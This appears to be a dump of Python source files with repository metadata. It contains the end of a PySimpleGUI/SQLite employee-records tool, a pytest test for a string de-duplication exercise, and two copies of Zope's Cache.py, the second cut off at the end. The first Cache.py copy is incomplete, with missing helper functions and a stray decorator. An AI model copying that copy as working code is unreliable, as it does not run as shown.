        dependent_type = empInfo[0][11]
        soa = empInfo[0][12]
        emp_status = empInfo[0][13]
        date_hired = empInfo[0][14]
        date_of_birth = empInfo[0][15]
        # Create a GUI for editing an employee
        while (True):
            SetOptions(background_color='#77A1D3',text_element_background_color='#77A1D3',font='Raleway')
            layout = [
                [sg.Text('Employee ID', size=(15, 1), auto_size_text=False, justification='right'), sg.InputText(empID),
                 sg.Text('Campus', size=(15, 1), auto_size_text=False, justification='right'),
                 sg.InputCombo(['Goa Campus', 'Caramoan Campus','Tinambac Campus','San Jose Campus','Lagonoy Campus','Salogon Campus','Sagnay Campus'], size=(38, 3),default_value=campus)],
                [sg.Text('Last Name', size=(15, 1), auto_size_text=False, justification='right'), sg.InputText(l_name),
                 sg.Text('Department', size=(15, 1), auto_size_text=False, justification='right'),sg.InputCombo(['College of Arts and Sciences', 'College of Education','College of Engineering and Technology','College of Business Management','None'], size=(38, 3), default_value=dept)],
                [sg.Text('First Name', size=(15, 1), auto_size_text=False, justification='right'), sg.InputText(f_name),
                 sg.Text('Address', size=(15, 1), auto_size_text=False, justification='right'), sg.InputText(address)],
                [sg.Text('Middle Name', size=(15, 1), auto_size_text=False, justification='right'), sg.InputText(m_name),
                 sg.Text('Dependent Type', size=(15, 1), auto_size_text=False, justification='right'),
                 sg.InputCombo(['-------'], size=(38, 3), default_value=dependent_type)],
                [sg.Text('Gender', size=(15, 1), auto_size_text=False, justification='right'),sg.InputCombo(['Male', 'Female'], size=(38, 3), default_value = gender),
                 sg.Text('Status of Appt.', size=(15, 1), auto_size_text=False, justification='right'),sg.InputCombo(['Permanent', 'Job Order','Contract of Service','Casual','Temporary'], size=(38, 3),default_value=soa)],
                [sg.Text('Civil Status', size=(15, 1), auto_size_text=False, justification='right'),sg.InputCombo(['Single', 'Married','Divorced','Widowed','Separated'], size=(38, 3),default_value=civil_status),
                 sg.Text('Employee Status', size=(15, 1), auto_size_text=False, justification='right'),sg.InputCombo(['Active', 'Inactive'], size=(38, 3),default_value=emp_status)],
                [sg.Text('Job Description', size=(15, 1), auto_size_text=False, justification='right'),sg.InputCombo(['Teaching', 'Non-Teaching'], size=(38, 3), default_value=job_desc),
                 sg.Text('Date Hired', size=(15, 1), auto_size_text=False, justification='right'), sg.InputText(date_hired)],
                [sg.Text('Position', size=(15, 1), auto_size_text=False, justification='right'),sg.InputCombo(['Position-Instructor 1, 2, & 3', 'Assistant-Professor 1& 2','Associate-Professor 1-5','Professor 1-6','University Professor','University President'], size=(38, 3),default_value=position),
                 sg.Text('Date of Birth', size=(15, 1), auto_size_text=False, justification='right'), sg.InputText(date_of_birth)],
                [sg.Text(" "*110),sg.Submit(), sg.Cancel()]]
            window = sg.Window('Edit Employee', auto_size_text=True, default_element_size=(40, 1)).Layout(layout)
            event,values = window.Read()
            if event == 'Submit' and '' in values:
                # Reject submits with any empty field and re-show the form.
                window.Close()
                ctypes.windll.user32.MessageBoxW(0, "Oops! Don't leave a field empty", "Errror!", 0)
            elif event == 'Cancel':
                window.Close()
                break
            elif event == 'Submit' and '' not in values:
                # The order of `values` mirrors the layout rows above, which
                # in turn matches the SET-clause order of this UPDATE.
                c.execute("""UPDATE tb_emp_info SET empID=?,campus=?,l_name=?,dept=?,f_name=?,address=?,m_name=?,
                dependent_type=?,gender=?,soa=?,civil_status=?,emp_status=?,job_desc=?,date_hired=?,position=?,
                date_of_birth=? WHERE empID=?""",(values[0],values[1],values[2],values[3],values[4],values[5],values[6],values[7],values[8],
                values[9],values[10],values[11],values[12],values[13],values[14],values[15],values[0]))
                conn.commit()
                window.Close()
                self.view_data()
                ctypes.windll.user32.MessageBoxW(0, 'Employee succesfully edited!', "Success!", 0)
                break
    else:
        ctypes.windll.user32.MessageBoxW(0, "No employee selected!", "Error!", 0)
def lockEmployee(self):
    """Disable (archive) the selected employee.

    Moves the row from tb_emp_info to tb_emp_inactive, then refreshes the
    table widget.

    Fixes over the original: the refresh now reuses ``view_data()`` so the
    widget shows the same 11 columns as everywhere else (the original ran
    ``SELECT *`` and pushed 16 columns at the widget), and the connection
    is closed.
    """
    conn = sqlite3.connect('db_employees.db')
    c = conn.cursor()
    try:
        data = self.tableWidget.selectedItems()
        empID = data[0].text()  # raises IndexError when nothing is selected
        c.execute("""INSERT INTO tb_emp_inactive SELECT * FROM tb_emp_info WHERE empID =?""", (empID,))
        conn.commit()
        c.execute("""DELETE from tb_emp_info WHERE empID=?""", (empID,))
        conn.commit()
        self.view_data()
        ctypes.windll.user32.MessageBoxW(0, " Employee successfuly disabled!", "Success", 0)
    except IndexError:
        ctypes.windll.user32.MessageBoxW(0, " No employee selected!", "Error", 0)
    finally:
        c.close()
        conn.close()
def inactive_emp_list(self):
    """Show the disabled-employee dialog (PySimpleGUI); a selected employee
    can be re-enabled, i.e. moved from tb_emp_inactive back to tb_emp_info.

    Loops, re-reading the archive after each action, until the dialog is
    cancelled or closed.

    NOTE(review): the sqlite connection opened here is never closed.
    """
    conn = sqlite3.connect('db_employees.db')
    c = conn.cursor()
    while (True):
        # Build "empID - Last, First Middle" display strings for the listbox.
        c.execute("""SELECT empID, (l_name||\", \"||f_name||\" \"||m_name) as name FROM tb_emp_inactive""")
        list_of_disabled_emp = c.fetchall()
        names = []
        for list_number,list_names in enumerate(list_of_disabled_emp):
            dict_of_names = {'empID':list_names[0], 'names': list_names[1]}
            empDetails = dict_of_names['empID'] +" - " + dict_of_names['names']
            names.append(empDetails)
        SetOptions(background_color='#77A1D3',text_element_background_color='#77A1D3',font='Raleway')
        layout = [[sg.Listbox(values=(names), size=(30,8))],
                  [sg.Text(" "*15),sg.Button('Enable'), sg.Cancel()]]
        window = sg.Window('Disabled Employees', auto_size_text=True, default_element_size=(40, 1)).Layout(layout)
        event,values = window.Read()
        if event == 'Enable':
            try:
                # values[0] is the listbox selection; the first whitespace
                # token of the display string is the empID.
                empID = values[0][0].split()[0]
                c.execute ("""INSERT INTO tb_emp_info SELECT * FROM tb_emp_inactive WHERE empID =?""",(str(empID),))
                conn.commit()
                c.execute ("""DELETE FROM tb_emp_inactive WHERE empID=?""",(str(empID),))
                conn.commit()
                window.Close()
                # Refresh the main table with the full record set.
                c.execute("""SELECT * FROM tb_emp_info """)
                result = c.fetchall()
                self.tableWidget.setRowCount(0)
                for row_number, row_data in enumerate(result):
                    self.tableWidget.insertRow(row_number)
                    for column_number, data in enumerate(row_data):
                        self.tableWidget.setItem(row_number, column_number, QtWidgets.QTableWidgetItem(str(data)))
            except IndexError:
                # Nothing was selected in the listbox.
                sg.Popup('Select an employee!')
                window.Close()
        else:
            window.Close()
            break
def closeWindow(self):
    """Close this window.

    The original called the module-global ``window`` (defined only when the
    module is run as a script), which breaks when this class is
    instantiated elsewhere; closing the instance itself is equivalent for
    the script case and always correct.
    """
    self.close()
# Script entry point: build the Qt application, show the registration
# window, and hand control to the Qt event loop until it exits.
if __name__=='__main__':
    import sys
    app=QtWidgets.QApplication(sys.argv)
    window=Ui_Registration2()
    window.show()
    sys.exit(app.exec_())
| 26,987 | 37 | 588 |
c5a131ddc452e6c9f18660f40d2b82d17ee59d7d | 467 | py | Python | Python/zzz_training_challenge/Python_Challenge/solutions/tests/ch04_strings/ex06_remove_duplicates_test.py | Kreijeck/learning | eaffee08e61f2a34e01eb8f9f04519aac633f48c | [
"MIT"
] | null | null | null | Python/zzz_training_challenge/Python_Challenge/solutions/tests/ch04_strings/ex06_remove_duplicates_test.py | Kreijeck/learning | eaffee08e61f2a34e01eb8f9f04519aac633f48c | [
"MIT"
] | null | null | null | Python/zzz_training_challenge/Python_Challenge/solutions/tests/ch04_strings/ex06_remove_duplicates_test.py | Kreijeck/learning | eaffee08e61f2a34e01eb8f9f04519aac633f48c | [
"MIT"
] | null | null | null | # Beispielprogramm für das Buch "Python Challenge"
#
# Copyright 2020 by Michael Inden
import pytest
from ch04_strings.solutions.ex06_remove_duplicates import remove_duplicates
@pytest.mark.parametrize("input, expected",
[("bananas", "bans"),
("lalalamama", "lam"),
("MICHAEL", "MICHAEL") ])
| 27.470588 | 75 | 0.633833 | # Beispielprogramm für das Buch "Python Challenge"
#
# Copyright 2020 by Michael Inden
import pytest
from ch04_strings.solutions.ex06_remove_duplicates import remove_duplicates
@pytest.mark.parametrize("input, expected",
[("bananas", "bans"),
("lalalamama", "lam"),
("MICHAEL", "MICHAEL") ])
def test_remove_duplicates(input, expected):
assert remove_duplicates(input) == expected
| 71 | 0 | 22 |
7fd34551b06770f4fbb94ded3fca72745a67740c | 18,380 | py | Python | src/OFS/Cache.py | hitotsunorb1/Zope | 6beac6385e1a302903889561385013874ef94cb1 | [
"ZPL-2.1"
] | null | null | null | src/OFS/Cache.py | hitotsunorb1/Zope | 6beac6385e1a302903889561385013874ef94cb1 | [
"ZPL-2.1"
] | 1 | 2020-11-11T07:11:31.000Z | 2020-11-11T07:11:31.000Z | src/OFS/Cache.py | hitotsunorb1/Zope | 6beac6385e1a302903889561385013874ef94cb1 | [
"ZPL-2.1"
] | null | null | null | ##############################################################################
#
# Copyright (c) 2002 Zope Foundation and Contributors.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE
#
##############################################################################
"""Cacheable object and cache management base classes.
"""
import sys
import time
from logging import getLogger
from AccessControl.class_init import InitializeClass
from AccessControl.Permissions import view_management_screens
from AccessControl.SecurityInfo import ClassSecurityInfo
from AccessControl.SecurityManagement import getSecurityManager
from AccessControl.unauthorized import Unauthorized
from Acquisition import aq_acquire
from Acquisition import aq_base
from Acquisition import aq_get
from Acquisition import aq_inner
from Acquisition import aq_parent
from App.special_dtml import DTMLFile
ZCM_MANAGERS = '__ZCacheManager_ids__'
ViewManagementScreensPermission = view_management_screens
ChangeCacheSettingsPermission = 'Change cache settings'
LOG = getLogger('Cache')
def filterCacheManagers(orig, container, name, value, extra):
    """aq_acquire filter: accept *name* only when it is registered as a
    cache manager on *container* (i.e. listed in its ZCM_MANAGERS ids).
    Returns 1 to accept the object, 0 to reject it.
    """
    base = aq_base(container)
    if not hasattr(base, ZCM_MANAGERS):
        return 0
    return 1 if name in getattr(container, ZCM_MANAGERS) else 0
def getVerifiedManagerIds(container):
    """Gets the list of cache managers in a container, verifying each one.

    Only ids whose object actually carries the ``_isCacheManager`` marker
    are returned.
    """
    candidates = getattr(container, ZCM_MANAGERS, ())
    return tuple(
        mgr_id for mgr_id in candidates
        if getattr(getattr(container, mgr_id, None), '_isCacheManager', 0)
    )
# Anytime a CacheManager is added or removed, all _v_ZCacheable_cache
# attributes must be invalidated. manager_timestamp is a way to do
# that.
manager_timestamp = 0
# --- Module-level helpers restored here. The extraction that produced this
# copy of the module dropped them, but `filterCacheTab` is referenced by
# Cacheable.manage_options below and would raise NameError at class-creation
# time. Definitions match the full copy of this module later in the file.

def isCacheable(ob):
    # True (1) when ob carries the Cacheable mix-in marker attribute.
    return getattr(aq_base(ob), '_isCacheable', 0)


def managersExist(ob):
    # Returns 1 if any CacheManagers exist in the context of ob.
    if aq_get(ob, ZCM_MANAGERS, None, 1):
        return 1
    return 0


def filterCacheTab(ob):
    # manage_options filter: show the Cache tab only if a manager exists.
    return managersExist(ob)


class Cacheable(object):
    """Mix-in for cacheable objects."""

    manage_options = (
        {
            'label': 'Cache',
            'action': 'ZCacheable_manage',
            'filter': filterCacheTab,
        },
    )

    security = ClassSecurityInfo()
    security.setPermissionDefault(ChangeCacheSettingsPermission, ('Manager',))

    security.declareProtected(ViewManagementScreensPermission, 'ZCacheable_manage')  # NOQA: D001,E501
    ZCacheable_manage = DTMLFile('dtml/cacheable', globals())

    # Volatile (per-connection) cache handle plus the manager_timestamp it
    # was captured under; see ZCacheable_getCache().
    _v_ZCacheable_cache = None
    _v_ZCacheable_manager_timestamp = 0
    __manager_id = None
    __enabled = True
    _isCacheable = True

    @security.private
    def ZCacheable_getManager(self):
        """Returns the currently associated cache manager."""
        manager_id = self.__manager_id
        if manager_id is None:
            return None
        try:
            return aq_acquire(
                self,
                manager_id,
                containment=1,
                filter=filterCacheManagers,
                extra=None,
                default=None
            )
        except AttributeError:
            return None

    @security.private
    def ZCacheable_getCache(self):
        """Gets the cache associated with this object.
        """
        if self.__manager_id is None:
            return None
        c = self._v_ZCacheable_cache
        if c is not None:
            # We have a volatile reference to the cache.
            if self._v_ZCacheable_manager_timestamp == manager_timestamp:
                return aq_base(c)
        manager = self.ZCacheable_getManager()
        if manager is not None:
            c = aq_base(manager.ZCacheManager_getCache())
        else:
            return None
        # Set a volatile reference to the cache then return it.
        self._v_ZCacheable_cache = c
        self._v_ZCacheable_manager_timestamp = manager_timestamp
        return c

    @security.private
    def ZCacheable_isCachingEnabled(self):
        """
        Returns true only if associated with a cache manager and
        caching of this method is enabled.
        """
        return self.__enabled and self.ZCacheable_getCache()

    @security.private
    def ZCacheable_getObAndView(self, view_name):
        # Restored from the full copy of this module later in the file:
        # the extraction dropped this method, leaving a stranded duplicate
        # @security.private decorator above ZCacheable_get.
        # Returns self and view_name unchanged.
        return self, view_name

    @security.private
    def ZCacheable_get(
        self,
        view_name='',
        keywords=None,
        mtime_func=None,
        default=None
    ):
        """Retrieves the cached view for the object under the
        conditions specified by keywords. If the value is
        not yet cached, returns the default.
        """
        c = self.ZCacheable_getCache()
        if c is not None and self.__enabled:
            ob, view_name = self.ZCacheable_getObAndView(view_name)
            try:
                val = c.ZCache_get(ob, view_name, keywords,
                                   mtime_func, default)
                return val
            except Exception:
                LOG.warning('ZCache_get() exception')
                return default
        return default

    @security.private
    def ZCacheable_set(
        self,
        data,
        view_name='',
        keywords=None,
        mtime_func=None
    ):
        """Cacheable views should call this method after generating
        cacheable results. The data argument can be of any Python type.
        """
        c = self.ZCacheable_getCache()
        if c is not None and self.__enabled:
            ob, view_name = self.ZCacheable_getObAndView(view_name)
            try:
                c.ZCache_set(ob, data, view_name, keywords,
                             mtime_func)
            except Exception:
                LOG.warning('ZCache_set() exception')

    @security.protected(ViewManagementScreensPermission)
    def ZCacheable_invalidate(self, view_name='', REQUEST=None):
        """Called after a cacheable object is edited. Causes all
        cache entries that apply to the view_name to be removed.
        Returns a status message.
        """
        c = self.ZCacheable_getCache()
        if c is not None:
            ob, view_name = self.ZCacheable_getObAndView(view_name)
            try:
                message = c.ZCache_invalidate(ob)
                if not message:
                    message = 'Invalidated.'
            except Exception:
                exc = sys.exc_info()
                try:
                    LOG.warning('ZCache_invalidate() exception')
                    message = 'An exception occurred: %s: %s' % exc[:2]
                finally:
                    exc = None
        else:
            message = 'This object is not associated with a cache manager.'
        if REQUEST is not None:
            return self.ZCacheable_manage(
                self, REQUEST, management_view='Cache',
                manage_tabs_message=message)
        return message

    @security.private
    def ZCacheable_getModTime(self, mtime_func=None):
        """Returns the highest of the last mod times."""
        # Based on:
        #   mtime_func
        #   self.mtime
        #   self.__class__.mtime
        mtime = 0
        if mtime_func:
            # Allow mtime_func to influence the mod time.
            mtime = mtime_func()
        base = aq_base(self)
        mtime = max(getattr(base, '_p_mtime', mtime) or 0, mtime)
        klass = getattr(base, '__class__', None)
        if klass:
            klass_mtime = getattr(klass, '_p_mtime', mtime)
            if isinstance(klass_mtime, int):
                mtime = max(klass_mtime, mtime)
        return mtime

    @security.protected(ViewManagementScreensPermission)
    def ZCacheable_getManagerId(self):
        """Returns the id of the current ZCacheManager."""
        return self.__manager_id

    @security.protected(ViewManagementScreensPermission)
    def ZCacheable_getManagerURL(self):
        """Returns the URL of the current ZCacheManager."""
        manager = self.ZCacheable_getManager()
        if manager is not None:
            return manager.absolute_url()
        return None

    @security.protected(ViewManagementScreensPermission)
    def ZCacheable_getManagerIds(self):
        """Returns a list of mappings containing the id and title
        of the available ZCacheManagers."""
        rval = []
        ob = self
        used_ids = {}
        while ob is not None:
            if hasattr(aq_base(ob), ZCM_MANAGERS):
                ids = getattr(ob, ZCM_MANAGERS)
                for id in ids:
                    manager = getattr(ob, id, None)
                    if manager is not None:
                        id = manager.getId()
                        if id not in used_ids:
                            title = getattr(aq_base(manager), 'title', '')
                            rval.append({'id': id, 'title': title})
                            used_ids[id] = 1
            ob = aq_parent(aq_inner(ob))
        return tuple(rval)

    @security.protected(ChangeCacheSettingsPermission)
    def ZCacheable_setManagerId(self, manager_id, REQUEST=None):
        """Changes the manager_id for this object."""
        self.ZCacheable_invalidate()
        if not manager_id:
            # User requested disassociation
            # from the cache manager.
            manager_id = None
        else:
            manager_id = str(manager_id)
        self.__manager_id = manager_id
        self._v_ZCacheable_cache = None
        if REQUEST is not None:
            return self.ZCacheable_manage(
                self,
                REQUEST,
                management_view='Cache',
                manage_tabs_message='Cache settings changed.'
            )

    @security.protected(ViewManagementScreensPermission)
    def ZCacheable_enabled(self):
        """Returns true if caching is enabled for this object or method."""
        return self.__enabled

    @security.protected(ChangeCacheSettingsPermission)
    def ZCacheable_setEnabled(self, enabled=0, REQUEST=None):
        """Changes the enabled flag."""
        self.__enabled = enabled and 1 or 0
        if REQUEST is not None:
            return self.ZCacheable_manage(
                self, REQUEST, management_view='Cache',
                manage_tabs_message='Cache settings changed.')

    @security.protected(ViewManagementScreensPermission)
    def ZCacheable_configHTML(self):
        """Override to provide configuration of caching
        behavior that can only be specific to the cacheable object.
        """
        return ''


InitializeClass(Cacheable)
def findCacheables(
    ob,
    manager_id,
    require_assoc,
    subfolders,
    meta_types,
    rval,
    path
):
    """
    Used by the CacheManager UI. Recursive. Similar to the Zope
    "Find" function. Finds all Cacheable objects in a hierarchy.

    Results are appended in place to *rval* as dicts with keys
    'sortkey', 'path', 'title', 'icon', 'associated'; *path* is the
    tuple of ids leading to *ob*.
    """
    try:
        if meta_types:
            subobs = ob.objectValues(meta_types)
        else:
            subobs = ob.objectValues()
        sm = getSecurityManager()
        # Add to the list of cacheable objects.
        for subob in subobs:
            if not isCacheable(subob):
                continue
            associated = (subob.ZCacheable_getManagerId() == manager_id)
            if require_assoc and not associated:
                continue
            # Only objects whose cache settings the current user may
            # change are listed.
            if not sm.checkPermission('Change cache settings', subob):
                continue
            subpath = path + (subob.getId(),)
            info = {
                'sortkey': subpath,
                'path': '/'.join(subpath),
                'title': getattr(aq_base(subob), 'title', ''),
                'icon': None,
                'associated': associated,
            }
            rval.append(info)
        # Visit subfolders.
        if subfolders:
            # Re-fetch without the meta_types filter so folders of any
            # type are still descended into.
            if meta_types:
                subobs = ob.objectValues()
            for subob in subobs:
                subpath = path + (subob.getId(),)
                if hasattr(aq_base(subob), 'objectValues'):
                    if sm.checkPermission(
                            'Access contents information', subob):
                        findCacheables(
                            subob, manager_id, require_assoc,
                            subfolders, meta_types, rval, subpath)
    except Exception:
        # Deliberate best-effort: a broken subtree must not abort the
        # whole UI search, so just dump the traceback and continue.
        import traceback
        traceback.print_exc()
class Cache(object):
    """
    A base class (and interface description) for caches.

    Concrete caches implement ZCache_get / ZCache_set / ZCache_invalidate
    (see the call sites in Cacheable above).

    Note that Cache objects are not intended to be visible by
    restricted code.
    """
class CacheManager(object):
    """
    A base class for cache managers. Implement ZCacheManager_getCache().
    """

    security = ClassSecurityInfo()
    security.setPermissionDefault(ChangeCacheSettingsPermission, ('Manager',))

    # Marker checked by getVerifiedManagerIds()/filterCacheManagers().
    # Fix: the original text had a stray `@security.private` decorator
    # directly above this assignment -- a SyntaxError, left behind when the
    # decorated method (per the class docstring, presumably
    # ZCacheManager_getCache(), which subclasses must implement) was lost.
    _isCacheManager = 1

    manage_options = (
        {
            'label': 'Associate',
            'action': 'ZCacheManager_associate',
        },
    )

    security.declareProtected(ChangeCacheSettingsPermission, 'ZCacheManager_associate')  # NOQA: D001,E501
    ZCacheManager_associate = DTMLFile('dtml/cmassoc', globals())

    @security.protected(ChangeCacheSettingsPermission)
    def ZCacheManager_locate(
        self,
        require_assoc,
        subfolders,
        meta_types=[],  # read-only default, never mutated
        REQUEST=None
    ):
        """Locates cacheable objects.
        """
        ob = aq_parent(aq_inner(self))
        rval = []
        manager_id = self.getId()
        if '' in meta_types:
            # User selected "All".
            meta_types = []
        findCacheables(
            ob,
            manager_id,
            require_assoc,
            subfolders,
            meta_types,
            rval,
            ()
        )
        if REQUEST is not None:
            return self.ZCacheManager_associate(
                self,
                REQUEST,
                show_results=1,
                results=rval,
                management_view="Associate"
            )
        return rval

    @security.protected(ChangeCacheSettingsPermission)
    def ZCacheManager_setAssociations(self, props=None, REQUEST=None):
        """Associates and un-associates cacheable objects with this
        cache manager.
        """
        addcount = 0
        remcount = 0
        parent = aq_parent(aq_inner(self))
        sm = getSecurityManager()
        my_id = str(self.getId())
        if props is None:
            props = REQUEST.form
        for key, do_associate in props.items():
            # Form keys look like "associate_<path>".
            if key[:10] == 'associate_':
                path = key[10:]
                ob = parent.restrictedTraverse(path)
                if not sm.checkPermission('Change cache settings', ob):
                    raise Unauthorized
                if not isCacheable(ob):
                    # Not a cacheable object.
                    continue
                manager_id = str(ob.ZCacheable_getManagerId())
                if do_associate:
                    if manager_id != my_id:
                        ob.ZCacheable_setManagerId(my_id)
                        addcount = addcount + 1
                else:
                    if manager_id == my_id:
                        ob.ZCacheable_setManagerId(None)
                        remcount = remcount + 1
        if REQUEST is not None:
            return self.ZCacheManager_associate(
                self, REQUEST, management_view="Associate",
                manage_tabs_message='%d association(s) made, %d removed.' %
                (addcount, remcount)
            )


InitializeClass(CacheManager)
| 33.601463 | 106 | 0.591621 | ##############################################################################
#
# Copyright (c) 2002 Zope Foundation and Contributors.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE
#
##############################################################################
"""Cacheable object and cache management base classes.
"""
import sys
import time
from logging import getLogger
from AccessControl.class_init import InitializeClass
from AccessControl.Permissions import view_management_screens
from AccessControl.SecurityInfo import ClassSecurityInfo
from AccessControl.SecurityManagement import getSecurityManager
from AccessControl.unauthorized import Unauthorized
from Acquisition import aq_acquire
from Acquisition import aq_base
from Acquisition import aq_get
from Acquisition import aq_inner
from Acquisition import aq_parent
from App.special_dtml import DTMLFile
ZCM_MANAGERS = '__ZCacheManager_ids__'
ViewManagementScreensPermission = view_management_screens
ChangeCacheSettingsPermission = 'Change cache settings'
LOG = getLogger('Cache')
def isCacheable(ob):
    # True (1) when ob carries the Cacheable mix-in marker attribute.
    return getattr(aq_base(ob), '_isCacheable', 0)
def managersExist(ob):
    """Return 1 if any CacheManagers exist in the acquisition context of
    *ob*, else 0."""
    found = aq_get(ob, ZCM_MANAGERS, None, 1)
    return 1 if found else 0
def filterCacheTab(ob):
    # manage_options filter: show the "Cache" tab only if a manager exists.
    return managersExist(ob)
def filterCacheManagers(orig, container, name, value, extra):
    """
    This is a filter method for aq_acquire.
    It causes objects to be found only if they are
    in the list of cache managers.
    """
    # Accept only names registered on the container's manager-id list.
    if hasattr(aq_base(container), ZCM_MANAGERS) and \
            name in getattr(container, ZCM_MANAGERS):
        return 1
    return 0
def getVerifiedManagerIds(container):
    """Gets the list of cache managers in a container, verifying each one."""
    ids = getattr(container, ZCM_MANAGERS, ())
    rval = []
    for id in ids:
        # Keep only ids whose object carries the _isCacheManager marker.
        if getattr(getattr(container, id, None), '_isCacheManager', 0):
            rval.append(id)
    return tuple(rval)
# Anytime a CacheManager is added or removed, all _v_ZCacheable_cache
# attributes must be invalidated. manager_timestamp is a way to do
# that.
manager_timestamp = 0
class Cacheable(object):
"""Mix-in for cacheable objects."""
manage_options = (
{
'label': 'Cache',
'action': 'ZCacheable_manage',
'filter': filterCacheTab,
},
)
security = ClassSecurityInfo()
security.setPermissionDefault(ChangeCacheSettingsPermission, ('Manager',))
security.declareProtected(ViewManagementScreensPermission, 'ZCacheable_manage') # NOQA: D001,E501
ZCacheable_manage = DTMLFile('dtml/cacheable', globals())
_v_ZCacheable_cache = None
_v_ZCacheable_manager_timestamp = 0
__manager_id = None
__enabled = True
_isCacheable = True
@security.private
def ZCacheable_getManager(self):
"""Returns the currently associated cache manager."""
manager_id = self.__manager_id
if manager_id is None:
return None
try:
return aq_acquire(
self,
manager_id,
containment=1,
filter=filterCacheManagers,
extra=None,
default=None
)
except AttributeError:
return None
@security.private
def ZCacheable_getCache(self):
"""Gets the cache associated with this object.
"""
if self.__manager_id is None:
return None
c = self._v_ZCacheable_cache
if c is not None:
# We have a volatile reference to the cache.
if self._v_ZCacheable_manager_timestamp == manager_timestamp:
return aq_base(c)
manager = self.ZCacheable_getManager()
if manager is not None:
c = aq_base(manager.ZCacheManager_getCache())
else:
return None
# Set a volatile reference to the cache then return it.
self._v_ZCacheable_cache = c
self._v_ZCacheable_manager_timestamp = manager_timestamp
return c
@security.private
def ZCacheable_isCachingEnabled(self):
"""
Returns true only if associated with a cache manager and
caching of this method is enabled.
"""
return self.__enabled and self.ZCacheable_getCache()
@security.private
def ZCacheable_getObAndView(self, view_name):
# Returns self and view_name unchanged.
return self, view_name
@security.private
def ZCacheable_get(
self,
view_name='',
keywords=None,
mtime_func=None,
default=None
):
"""Retrieves the cached view for the object under the
conditions specified by keywords. If the value is
not yet cached, returns the default.
"""
c = self.ZCacheable_getCache()
if c is not None and self.__enabled:
ob, view_name = self.ZCacheable_getObAndView(view_name)
try:
val = c.ZCache_get(ob, view_name, keywords,
mtime_func, default)
return val
except Exception:
LOG.warning('ZCache_get() exception')
return default
return default
@security.private
def ZCacheable_set(
self,
data,
view_name='',
keywords=None,
mtime_func=None
):
"""Cacheable views should call this method after generating
cacheable results. The data argument can be of any Python type.
"""
c = self.ZCacheable_getCache()
if c is not None and self.__enabled:
ob, view_name = self.ZCacheable_getObAndView(view_name)
try:
c.ZCache_set(ob, data, view_name, keywords,
mtime_func)
except Exception:
LOG.warning('ZCache_set() exception')
@security.protected(ViewManagementScreensPermission)
def ZCacheable_invalidate(self, view_name='', REQUEST=None):
"""Called after a cacheable object is edited. Causes all
cache entries that apply to the view_name to be removed.
Returns a status message.
"""
c = self.ZCacheable_getCache()
if c is not None:
ob, view_name = self.ZCacheable_getObAndView(view_name)
try:
message = c.ZCache_invalidate(ob)
if not message:
message = 'Invalidated.'
except Exception:
exc = sys.exc_info()
try:
LOG.warning('ZCache_invalidate() exception')
message = 'An exception occurred: %s: %s' % exc[:2]
finally:
exc = None
else:
message = 'This object is not associated with a cache manager.'
if REQUEST is not None:
return self.ZCacheable_manage(
self, REQUEST, management_view='Cache',
manage_tabs_message=message)
return message
    @security.private
    def ZCacheable_getModTime(self, mtime_func=None):
        """Returns the highest of the last mod times.

        Considers, in order: the value returned by ``mtime_func`` (if
        given), the persistent modification time of the instance, and
        the persistent modification time of its class.
        """
        mtime = 0
        if mtime_func:
            # Allow mtime_func to influence the mod time.
            mtime = mtime_func()
        base = aq_base(self)
        # _p_mtime may be None/absent for unsaved objects; "or 0" maps
        # a None value to 0 so max() always compares numbers.
        mtime = max(getattr(base, '_p_mtime', mtime) or 0, mtime)
        klass = getattr(base, '__class__', None)
        if klass:
            klass_mtime = getattr(klass, '_p_mtime', mtime)
            # NOTE(review): ZODB ``_p_mtime`` is typically a float, which
            # this isinstance(..., int) check would skip -- confirm whether
            # float class mod times are intentionally ignored here.
            if isinstance(klass_mtime, int):
                mtime = max(klass_mtime, mtime)
        return mtime
    @security.protected(ViewManagementScreensPermission)
    def ZCacheable_getManagerId(self):
        """Returns the id of the current ZCacheManager."""
        # None means this object is not associated with a cache manager.
        return self.__manager_id
@security.protected(ViewManagementScreensPermission)
def ZCacheable_getManagerURL(self):
"""Returns the URL of the current ZCacheManager."""
manager = self.ZCacheable_getManager()
if manager is not None:
return manager.absolute_url()
return None
@security.protected(ViewManagementScreensPermission)
def ZCacheable_getManagerIds(self):
"""Returns a list of mappings containing the id and title
of the available ZCacheManagers."""
rval = []
ob = self
used_ids = {}
while ob is not None:
if hasattr(aq_base(ob), ZCM_MANAGERS):
ids = getattr(ob, ZCM_MANAGERS)
for id in ids:
manager = getattr(ob, id, None)
if manager is not None:
id = manager.getId()
if id not in used_ids:
title = getattr(aq_base(manager), 'title', '')
rval.append({'id': id, 'title': title})
used_ids[id] = 1
ob = aq_parent(aq_inner(ob))
return tuple(rval)
@security.protected(ChangeCacheSettingsPermission)
def ZCacheable_setManagerId(self, manager_id, REQUEST=None):
"""Changes the manager_id for this object."""
self.ZCacheable_invalidate()
if not manager_id:
# User requested disassociation
# from the cache manager.
manager_id = None
else:
manager_id = str(manager_id)
self.__manager_id = manager_id
self._v_ZCacheable_cache = None
if REQUEST is not None:
return self.ZCacheable_manage(
self,
REQUEST,
management_view='Cache',
manage_tabs_message='Cache settings changed.'
)
    @security.protected(ViewManagementScreensPermission)
    def ZCacheable_enabled(self):
        """Returns true if caching is enabled for this object or method."""
        # Stored as the integers 1/0 (see ZCacheable_setEnabled).
        return self.__enabled
@security.protected(ChangeCacheSettingsPermission)
def ZCacheable_setEnabled(self, enabled=0, REQUEST=None):
"""Changes the enabled flag."""
self.__enabled = enabled and 1 or 0
if REQUEST is not None:
return self.ZCacheable_manage(
self, REQUEST, management_view='Cache',
manage_tabs_message='Cache settings changed.')
    @security.protected(ViewManagementScreensPermission)
    def ZCacheable_configHTML(self):
        """Override to provide configuration of caching
